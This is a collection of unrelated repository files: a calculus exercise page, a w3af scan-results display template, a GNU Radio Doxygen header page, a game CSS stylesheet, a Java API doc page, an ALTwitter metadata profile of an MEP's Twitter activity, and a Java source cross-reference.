</tr>
<tr>
<td class="l m b0 r0 l0 t0 lines">\(\phantom{-}0.01\)</td>
<td class="l m b0 r0 l0 t0 lines"></td>
</tr>
<tr>
<td class="l m b0 r0 l0 t0 lines">\(\phantom{-}0.1\)</td>
<td class="l m b0 r0 l0 t0 lines"></td>
</tr>
</table></div>
</div>
<div class="sbsrow" style="margin-left:0%;margin-right:0%;">
<figcaption class="sbscaption" style="width:50%;"></figcaption><figcaption class="sbscaption" style="width:50%;"><span class="heading">Table</span><span class="codenumber">1.3.3</span>\(y=\frac{\fe{V}{4+h}-\fe{V}{4}}{h}\)</figcaption>
</div>
</div></article><article class="exercise-like" id="exercise-28"><h5 class="heading"><span class="codenumber">20</span></h5>
<p id="p-91">What is the unit for the \(y\) values in <a knowl="./knowl/table-vat.html" knowl-id="xref-table-vat" alt="Table 1.3.3 " title="Table 1.3.3 ">Table 1.3.3</a>? What do these values (with their unit) tell you in the context of this problem?</p></article><article class="exercise-like" id="exercise-vat-last"><h5 class="heading"><span class="codenumber">21</span></h5>
<p id="p-92">As the value of \(h\) gets closer to \(0\), the values in the \(y\) column of <a knowl="./knowl/table-vat.html" knowl-id="xref-table-vat" alt="Table 1.3.3 " title="Table 1.3.3 ">Table 1.3.3</a> appear to be converging to a single number; what is this number and what do you think that value (with its unit) tells you in the context of this problem?</p></article>
</div>
</div><span class="incontext"><a href="section-difference-quotient.html#exercisegroup-vat">in-context</a></span>
|
w3af_result_organizer/templates/vuln.html | lalelunet/w3af_results_organizer | <!DOCTYPE html>
<html>
<head>
<script src="/js/jquery-2.2.3.min.js"></script>
</head>
<body>
<h1>Vulns </h1>
<ul>
{{ range $key, $value := . }}
<li class="vuln" id="vuln-{{$value.id}}" style="list-style-type: none; padding: 10px; border-bottom: 1px solid brown; line-height: 30px;">
<div align="right">
id: {{ $value.id }} project: {{ $value.project }} scan nr.: {{ $value.scan }} <a class="fp" state="1" key="{{$value.id}}" href="javascript:void(0)">false - positiv</a> | <a class="fp" state="2" key="{{$value.id}}" href="javascript:void(0)">resolved</a> | <a class="fp" state="3" key="{{$value.id}}" href="javascript:void(0)">confirm and ignore</a></div>
<br /><a href="{{ $value.url }}" target="_blank">{{ $value.url }}</a>
<br /><input type="text" id="vuln_comment-{{$value.id}}" placeholder="comment" style="width: 90%; padding: 20; " value="{{ $value.comment }}"></input>
<br />{{ $value.desc }}<br /><br />
</li>
{{ end }}
</ul>
<script>
$('.fp').click(function(){
$.get('/vuln/status/', { 'vuln' : $(this).attr('key'), 'state' : $(this).attr('state'), 'comment' : $('#vuln_comment-'+$(this).attr('key')).val() }, function(){
//$('#vuln-'+$(this).attr('key')).val().fadeOut();
});
$('#vuln-'+$(this).attr('key')).fadeOut();
});
</script>
</body>
</html>
|
build/docs/doxygen/html/fpll__btloop__coupling_8h_source.html | katsikas/gnuradio | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>GNU Radio 7f75d35b C++ API: fpll_btloop_coupling.h Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
<link href="navtree.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="resize.js"></script>
<script type="text/javascript" src="navtree.js"></script>
<script type="text/javascript">
$(document).ready(initResizable);
</script>
</head>
<body>
<div id="top"><!-- do not remove this div! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">GNU Radio 7f75d35b C++ API
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- Generated by Doxygen 1.7.6.1 -->
</div>
<div id="side-nav" class="ui-resizable side-nav-resizable">
<div id="nav-tree">
<div id="nav-tree-contents">
</div>
</div>
<div id="splitbar" style="-moz-user-select:none;"
class="ui-resizable-handle">
</div>
</div>
<script type="text/javascript">
initNavTree('fpll__btloop__coupling_8h.html','');
</script>
<div id="doc-content">
<div class="header">
<div class="headertitle">
<div class="title">fpll_btloop_coupling.h</div> </div>
</div><!--header-->
<div class="contents">
<a href="fpll__btloop__coupling_8h.html">Go to the documentation of this file.</a><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">/* -*- c++ -*- */</span>
<a name="l00002"></a>00002 <span class="comment">/*</span>
<a name="l00003"></a>00003 <span class="comment"> * Copyright 2002 Free Software Foundation, Inc.</span>
<a name="l00004"></a>00004 <span class="comment"> *</span>
<a name="l00005"></a>00005 <span class="comment"> * This file is part of GNU Radio</span>
<a name="l00006"></a>00006 <span class="comment"> *</span>
<a name="l00007"></a>00007 <span class="comment"> * GNU Radio is free software; you can redistribute it and/or modify</span>
<a name="l00008"></a>00008 <span class="comment"> * it under the terms of the GNU General Public License as published by</span>
<a name="l00009"></a>00009 <span class="comment"> * the Free Software Foundation; either version 3, or (at your option)</span>
<a name="l00010"></a>00010 <span class="comment"> * any later version.</span>
<a name="l00011"></a>00011 <span class="comment"> *</span>
<a name="l00012"></a>00012 <span class="comment"> * GNU Radio is distributed in the hope that it will be useful,</span>
<a name="l00013"></a>00013 <span class="comment"> * but WITHOUT ANY WARRANTY; without even the implied warranty of</span>
<a name="l00014"></a>00014 <span class="comment"> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the</span>
<a name="l00015"></a>00015 <span class="comment"> * GNU General Public License for more details.</span>
<a name="l00016"></a>00016 <span class="comment"> *</span>
<a name="l00017"></a>00017 <span class="comment"> * You should have received a copy of the GNU General Public License</span>
<a name="l00018"></a>00018 <span class="comment"> * along with GNU Radio; see the file COPYING. If not, write to</span>
<a name="l00019"></a>00019 <span class="comment"> * the Free Software Foundation, Inc., 51 Franklin Street,</span>
<a name="l00020"></a>00020 <span class="comment"> * Boston, MA 02110-1301, USA.</span>
<a name="l00021"></a>00021 <span class="comment"> */</span>
<a name="l00022"></a>00022 <span class="preprocessor">#ifndef _FPLL_BTLOOP_COUPLING_H_</span>
<a name="l00023"></a>00023 <span class="preprocessor"></span><span class="preprocessor">#define _FPLL_BTLOOP_COUPLING_H_</span>
<a name="l00024"></a>00024 <span class="preprocessor"></span><span class="comment"></span>
<a name="l00025"></a>00025 <span class="comment">/*!</span>
<a name="l00026"></a>00026 <span class="comment"> * Magic coupling constant between GrAtscFPLL and GrAtscBitTimingLoop.</span>
<a name="l00027"></a>00027 <span class="comment"> * Trust me, you don't want to mess with this.</span>
<a name="l00028"></a>00028 <span class="comment"> *</span>
<a name="l00029"></a>00029 <span class="comment"> * The agc block buried in the FPLL indirectly sets the level of the input</span>
<a name="l00030"></a>00030 <span class="comment"> * to the bit timing loop. The bit timing loop's convergence properties</span>
<a name="l00031"></a>00031 <span class="comment"> * depend on the the mean amplitude of it's input. This constant ties</span>
<a name="l00032"></a>00032 <span class="comment"> * them together such that you can tweak the input level of the bit timing loop</span>
<a name="l00033"></a>00033 <span class="comment"> * (somewhat) without screwing everything.</span>
<a name="l00034"></a>00034 <span class="comment"> */</span>
<a name="l00035"></a>00035
<a name="l00036"></a><a class="code" href="fpll__btloop__coupling_8h.html#a38227bf2b94d5fb31796b186c1226fb7">00036</a> <span class="keyword">static</span> <span class="keyword">const</span> <span class="keywordtype">float</span> <a class="code" href="fpll__btloop__coupling_8h.html#a38227bf2b94d5fb31796b186c1226fb7">FPLL_BTLOOP_COUPLING_CONST</a> = 3.125;
<a name="l00037"></a>00037
<a name="l00038"></a>00038 <span class="preprocessor">#endif </span><span class="comment">/* _FPLL_BTLOOP_COUPLING_H_ */</span>
</pre></div></div><!-- contents -->
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="fpll__btloop__coupling_8h.html">fpll_btloop_coupling.h</a> </li>
<li class="footer">Generated on Thu Sep 27 2012 10:49:24 for GNU Radio 7f75d35b C++ API by
<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.7.6.1 </li>
</ul>
</div>
</body>
</html>
|
engine/engine.css | RomboEntertainment/reloaded | /*@import url(http://fonts.googleapis.com/css?family=Ubuntu);*/
@font-face {
font-family: "Ubuntu";
src: local("Ubuntu"), url("Ubuntu-R.ttf") format("truetype");
}
.rombo-engine-gameholder
{
font-family: 'Ubuntu', sans-serif;
color: #fff;
font-size: 24px;
text-shadow: 0 0 10px #000000;
}
.rombo-engine-menuholder
{
}
.rombo-engine-menuholder small
{
font-size: 12px;
}
.rombo-engine-menu-default
{
border: 32px solid transparent;
border-image: url(images/red.png) fill 32 stretch;
height: 32px;
margin: -32px;
opacity: 0.6;
transition: .5s;
text-align:center;
}
.rombo-engine-menu-image
{
opacity: 0.6;
transition: .5s;
text-align:center;
}
.rombo-engine-menu-active
{
opacity: 1;
}
.rombo-engine-menu-active *
{
opacity: 1;
}
.rombo-engine-notif-text
{
border: 32px solid transparent;
border-image: url(images/red.png) fill 32 stretch;
height: 32px;
margin: -32px;
opacity: 0.3;
/* transition: .5s; */
text-align:center;
}
.rombo-engine-notif-text:last-child
{
opacity: 1;
}
.rombo-engine-menu-flatbar
{
border: 16px solid transparent;
border-image: url(images/red.png) fill 32 stretch;
width: 4px;
height: 16px;
float: left;
}
.rombo-engine-menu-seldot
{
border: 16px solid transparent;
border-image: url(images/red.png) fill 32 stretch;
width: 0px;
height: 16px;
float: left;
}
|
poi-3.8/docs/apidocs/org/apache/poi/openxml4j/opc/signature/package-use.html | gmchen/MosquitoSimulation | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_29) on Sat Mar 17 18:06:16 MSK 2012 -->
<TITLE>
Uses of Package org.apache.poi.openxml4j.opc.signature (POI API Documentation)
</TITLE>
<META NAME="date" CONTENT="2012-03-17">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Package org.apache.poi.openxml4j.opc.signature (POI API Documentation)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?org/apache/poi/openxml4j/opc/signature/package-use.html" target="_top"><B>FRAMES</B></A>
<A HREF="package-use.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Package<br>org.apache.poi.openxml4j.opc.signature</B></H2>
</CENTER>
No usage of org.apache.poi.openxml4j.opc.signature
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <FONT CLASS="NavBarFont1">Class</FONT> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../../index.html?org/apache/poi/openxml4j/opc/signature/package-use.html" target="_top"><B>FRAMES</B></A>
<A HREF="package-use.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
<i>Copyright 2012 The Apache Software Foundation or
its licensors, as applicable.</i>
</BODY>
</HTML>
|
pages/sylikiotis.html | sidtechnical/ALTwitter |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Neoklis Sylikiotis</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="Description" lang="en" content="Haukna Metadata (2): Altwitter - Twitter metadata Profiles of the Members of the European Parliament">
<meta name="author" content="Sid Rao, Ford-Mozilla Open Web Fellow">
<meta name="robots" content="index, follow">
<!-- icons -->
<link rel="apple-touch-icon" href="assets/img/apple-touch-icon.png">
<link rel="shortcut icon" href="../assets/img/ALTwitter.gif">
<!-- Bootstrap Core CSS file -->
<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<!-- Override CSS file - add your own CSS rules -->
<link rel="stylesheet" href="../assets/css/styles.css">
</head>
<body>
<!-- Navigation -->
<nav class="navbar navbar-fixed-top navbar-inverse" role="navigation">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="../index.html"><span class="glyphicon glyphicon-home"></span> <b>ALT</b>witter</a>
</div>
</div>
<!-- /.container-fluid -->
</nav>
<!-- /.navbar -->
<!-- Page Content -->
<div class="container-fluid">
<div class="row">
<div class="col-sm-8 col-sm-push-4 ">
<div class="panel panel-default">
<div class="panel-body" style="background-color:#87CEFA"><p>We analyzed 721 tweets from <span class="glyphicon glyphicon-time"></span> 2014-05-08 06:28:30 to <span class="glyphicon glyphicon-time"></span> 2017-04-13 09:21:44 (1071 days). <b>225</b> out of these <b>721</b> tweets by <b>Neoklis Sylikiotis</b> were re-tweets, which is <b>31.2</b>%.</p>
<p> Based on the metadata associated with these, we can understand Neoklis Sylikiotis's Twitter usage patterns on hourly or weekly basis, timezones, geo-location tags, devices that have been used, etc. </p>
<p class="small text-center" style="font-weight:bold;">Created on <span class="glyphicon glyphicon-time"></span> 2017-04-14 16:40:22</p>
</div>
</div>
<br>
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title" style="font-weight: bold">Hourly Twitter activities according to the metadata.</h4>
</div>
<div class="panel-body">
<figure class="margin-b-2">
<img class="img-responsive" style="width:650px" src="../assets/img/hourly/sylikiotis_hourly.svg" alt="Hourly Activities">
</figure>
</div>
</div>
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title" style="font-weight: bold">Weekly Twitter activities according to the metadata.</h4>
</div>
<div class="panel-body">
<figure class="margin-b-2">
<img class="img-responsive" style="width:650px" src="../assets/img/weekly/sylikiotis_weekly.svg" alt="Weekly Activities">
</figure>
</div>
</div>
<div class="row">
<div class="col-md-6">
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title" style="font-weight: bold">Top 5 most retweeted users</h4>
</div>
<div class="panel-body">
<dl class="dl-horizontal">
<dt> @GUENGL </dt> <dd> 48 (21.3%)</dd>
<dt> @dialogoscy </dt> <dd> 46 (20.4%)</dd>
<dt> @EP_CYPRUS </dt> <dd> 22 (9.8%)</dd>
<dt> @EUROKERDOS </dt> <dd> 9 (4.0%)</dd>
<dt> @AKEL1926 </dt> <dd> 8 (3.6%)</dd>
</dl>
</div>
</div>
</div>
<div class="col-md-6">
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title" style="font-weight: bold">Top 5 most mentioned users</h4>
</div>
<div class="panel-body">
<dl class="dl-horizontal">
<dt> @sylikiotis </dt> <dd> 168 (23.0%)</dd>
<dt> @GUENGL </dt> <dd> 99 (13.6%)</dd>
<dt> @dialogoscy </dt> <dd> 50 (6.8%)</dd>
<dt> @AKEL1926 </dt> <dd> 39 (5.3%)</dd>
<dt> @EP_CYPRUS </dt> <dd> 27 (3.7%)</dd>
</dl>
</div>
</div>
</div>
<div class="col-md-6">
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title" style="font-weight: bold">Top 10 hashtags</h4>
</div>
<div class="panel-body">
<dl class="dl-horizontal">
<dt> #Cyprus </dt> <dd> 44 (7.6%)</dd>
<dt> #cyprus </dt> <dd> 43 (7.4%)</dd>
<dt> #guengl </dt> <dd> 34 (5.9%)</dd>
<dt> #EPlenary </dt> <dd> 22 (3.8%)</dd>
<dt> #EU </dt> <dd> 22 (3.8%)</dd>
<dt> #akel </dt> <dd> 15 (2.6%)</dd>
<dt> #TTIP </dt> <dd> 10 (1.7%)</dd>
<dt> #Palestine </dt> <dd> 10 (1.7%)</dd>
<dt> #GueNgl </dt> <dd> 10 (1.7%)</dd>
<dt> #sylikiotis </dt> <dd> 9 (1.6%)</dd>
</dl>
</div>
</div>
</div>
<div class="col-md-6">
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title" style="font-weight: bold">Most referenced websites</h4>
</div>
<div class="panel-body">
<dl class="dl-horizontal">
<dt> fb.me </dt> <dd> 109 (34.9%)</dd>
<dt> dialogos.com.cy </dt> <dd> 38 (12.2%)</dd>
<dt> bit.ly </dt> <dd> 35 (11.2%)</dd>
<dt> youtu.be </dt> <dd> 31 (9.9%)</dd>
<dt> cyprusnews.eu </dt> <dd> 13 (4.2%)</dd>
<dt> shar.es </dt> <dd> 13 (4.2%)</dd>
<dt> www.akel.org.cy </dt> <dd> 10 (3.2%)</dd>
<dt> ow.ly </dt> <dd> 10 (3.2%)</dd>
<dt> www.guengl.eu </dt> <dd> 8 (2.6%)</dd>
<dt> www.youtube.com </dt> <dd> 8 (2.6%)</dd>
</dl>
</div>
</div>
</div>
</div>
<!-- Pager -->
<nav>
<ul class="pager">
<li class="previous"><a href="KaySwinburneMEP.html"><span class="glyphicon glyphicon-menu-left" aria-hidden="true"></span> Previous</a></li>
<li class="next"><a href="Synadinos_Eleft.html">Next <span class="glyphicon glyphicon-menu-right" aria-hidden="true"></span></a></li>
</ul>
</nav>
</div>
<div class="col-sm-4 col-sm-pull-8">
<figure class="margin-b-2">
<img class="img-responsive" width="300" height="300" src="../assets/img/profiles/sylikiotis_prof_img.jpg" alt="Profile Image">
<figcaption class="margin-t-h"><h4 class="text-capitalize" style="font-weight: bold">Neoklis Sylikiotis</h4> <br>
<b>@sylikiotis</b>
<br>
Account created on <span class="glyphicon glyphicon-time"></span> Wednesday 07 May, 2014.
</figcaption>
</figure>
<!-- Panel -->
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title">Profile info</h4>
</div>
<div class="panel-body">
<p>Μέλος Κεντρικής Επιτροπής και Πολιτικού Γραφείου ΑΚΕΛ & Ευρωβουλευτής / Member of the Central Committee and the Political Bureau of AKEL & MEP</p>
<hr>
<dl class="dl-horizontal">
<dt>Location</dt> <dd>Nicosia/Limassol, Cyprus</dd>
<dt>Following <span class="glyphicon glyphicon-user" style="color:#337ab7;"></span></dt><dd> 1631</dd>
<dt>Followers <span class="glyphicon glyphicon-user" style="color:#337ab7;"></span></dt><dd> 2758</dd>
<dt>Total Tweets</dt><dd> 721</dd>
</dl>
</div>
</div>
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title">Meta info</h4>
</div>
<div class="panel-body">
<dl class="dl-horizontal">
<dt>Language</dt> <dd> EN-GB</dd>
<dt>Managed by multiple people?</dt> <dd> False</dd>
<dt>Geo Enabled</dt> <dd> False</dd>
<dt>Time Zone</dt> <dd> Pacific Time (US & Canada)</dd>
<dt>UTC offset</dt> <dd> -25200</dd>
<dt>Tweets /Day</dt> <dd> 0.7</dd>
</dl>
</div>
</div>
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title" style="font-weight: bold">Detected languages</h4>
</div>
<div class="panel-body">
<dl class="dl-horizontal">
<dt class="text-uppercase"> el </dt> <dd> 593 (82.2%)</dd>
<dt class="text-uppercase"> en </dt> <dd> 106 (14.7%)</dd>
<dt class="text-uppercase"> und </dt> <dd> 11 (1.5%)</dd>
<dt class="text-uppercase"> es </dt> <dd> 3 (0.4%)</dd>
<dt class="text-uppercase"> de </dt> <dd> 2 (0.3%)</dd>
</dl>
</div>
</div>
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title" style="font-weight: bold">Detected Sources</h4>
</div>
<div class="panel-body">
<dl class="dl-horizontal">
<dt> Twitter Web Client </dt> <dd> 278 (38.6%)</dd>
<dt> Twitter for Android </dt> <dd> 164 (22.7%)</dd>
<dt> Twitter for Windows Phone </dt> <dd> 139 (19.3%)</dd>
<dt> Facebook </dt> <dd> 112 (15.5%)</dd>
<dt> TweetDeck </dt> <dd> 7 (1.0%)</dd>
</dl>
</div>
</div>
<div class="panel panel-default">
<div class="panel-heading">
<h4 class="panel-title" style="font-weight: bold">Detected places (0 found)</h4>
</div>
<div class="panel-body">
<dl class="dl-horizontal">
</dl>
</div>
</div>
</div>
</div>
<!-- /.row -->
<hr>
<footer class="margin-tb-3 text-center">
<div class="row">
<div class="container">
<p>Made with <span class="glyphicon glyphicon-heart" style="color:red"></span> by <a href="https://twitter.com/sidnext2none">Sid Rao</a>
<br>
<a href="https://advocacy.mozilla.org/en-US/open-web-fellows/fellows2016">Ford-Mozilla Open Web Fellow</a>
<br>
<a href="https://edri.org/"><h4>European Digital Rights (EDRi)</h4></a>
</p>
</div>
</div>
</footer>
</div>
<!-- /.container-fluid -->
<!-- JQuery scripts -->
<script src="assets/js/jquery-1.11.2.min.js"></script>
<!-- Bootstrap Core scripts -->
<script src="assets/js/bootstrap.min.js"></script>
</body>
</html>
|
docs/xref/eu/fbk/dkm/pikes/raid/pipeline/SpanLabeller.html | dkmfbk/pikes | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>SpanLabeller xref</title>
<link type="text/css" rel="stylesheet" href="../../../../../../stylesheet.css" />
</head>
<body>
<pre>
<a class="jxr_linenumber" name="L1" href="#L1">1</a> <strong class="jxr_keyword">package</strong> eu.fbk.dkm.pikes.raid.pipeline;
<a class="jxr_linenumber" name="L2" href="#L2">2</a>
<a class="jxr_linenumber" name="L3" href="#L3">3</a> <strong class="jxr_keyword">import</strong> java.io.IOException;
<a class="jxr_linenumber" name="L4" href="#L4">4</a> <strong class="jxr_keyword">import</strong> java.nio.file.Path;
<a class="jxr_linenumber" name="L5" href="#L5">5</a> <strong class="jxr_keyword">import</strong> java.util.Collections;
<a class="jxr_linenumber" name="L6" href="#L6">6</a> <strong class="jxr_keyword">import</strong> java.util.Comparator;
<a class="jxr_linenumber" name="L7" href="#L7">7</a> <strong class="jxr_keyword">import</strong> java.util.List;
<a class="jxr_linenumber" name="L8" href="#L8">8</a> <strong class="jxr_keyword">import</strong> java.util.Set;
<a class="jxr_linenumber" name="L9" href="#L9">9</a>
<a class="jxr_linenumber" name="L10" href="#L10">10</a> <strong class="jxr_keyword">import</strong> javax.annotation.Nullable;
<a class="jxr_linenumber" name="L11" href="#L11">11</a>
<a class="jxr_linenumber" name="L12" href="#L12">12</a> <strong class="jxr_keyword">import</strong> com.google.common.collect.ImmutableList;
<a class="jxr_linenumber" name="L13" href="#L13">13</a> <strong class="jxr_keyword">import</strong> com.google.common.collect.ImmutableSet;
<a class="jxr_linenumber" name="L14" href="#L14">14</a> <strong class="jxr_keyword">import</strong> com.google.common.collect.Iterables;
<a class="jxr_linenumber" name="L15" href="#L15">15</a> <strong class="jxr_keyword">import</strong> com.google.common.collect.Lists;
<a class="jxr_linenumber" name="L16" href="#L16">16</a> <strong class="jxr_keyword">import</strong> com.google.common.collect.Ordering;
<a class="jxr_linenumber" name="L17" href="#L17">17</a> <strong class="jxr_keyword">import</strong> com.google.common.collect.Sets;
<a class="jxr_linenumber" name="L18" href="#L18">18</a>
<a class="jxr_linenumber" name="L19" href="#L19">19</a> <strong class="jxr_keyword">import</strong> eu.fbk.utils.core.Range;
<a class="jxr_linenumber" name="L20" href="#L20">20</a> <strong class="jxr_keyword">import</strong> org.slf4j.Logger;
<a class="jxr_linenumber" name="L21" href="#L21">21</a> <strong class="jxr_keyword">import</strong> org.slf4j.LoggerFactory;
<a class="jxr_linenumber" name="L22" href="#L22">22</a>
<a class="jxr_linenumber" name="L23" href="#L23">23</a> <strong class="jxr_keyword">import</strong> ixa.kaflib.Dep;
<a class="jxr_linenumber" name="L24" href="#L24">24</a> <strong class="jxr_keyword">import</strong> ixa.kaflib.Entity;
<a class="jxr_linenumber" name="L25" href="#L25">25</a> <strong class="jxr_keyword">import</strong> ixa.kaflib.KAFDocument;
<a class="jxr_linenumber" name="L26" href="#L26">26</a> <strong class="jxr_keyword">import</strong> ixa.kaflib.Predicate;
<a class="jxr_linenumber" name="L27" href="#L27">27</a> <strong class="jxr_keyword">import</strong> ixa.kaflib.Predicate.Role;
<a class="jxr_linenumber" name="L28" href="#L28">28</a> <strong class="jxr_keyword">import</strong> ixa.kaflib.Span;
<a class="jxr_linenumber" name="L29" href="#L29">29</a> <strong class="jxr_keyword">import</strong> ixa.kaflib.Term;
<a class="jxr_linenumber" name="L30" href="#L30">30</a>
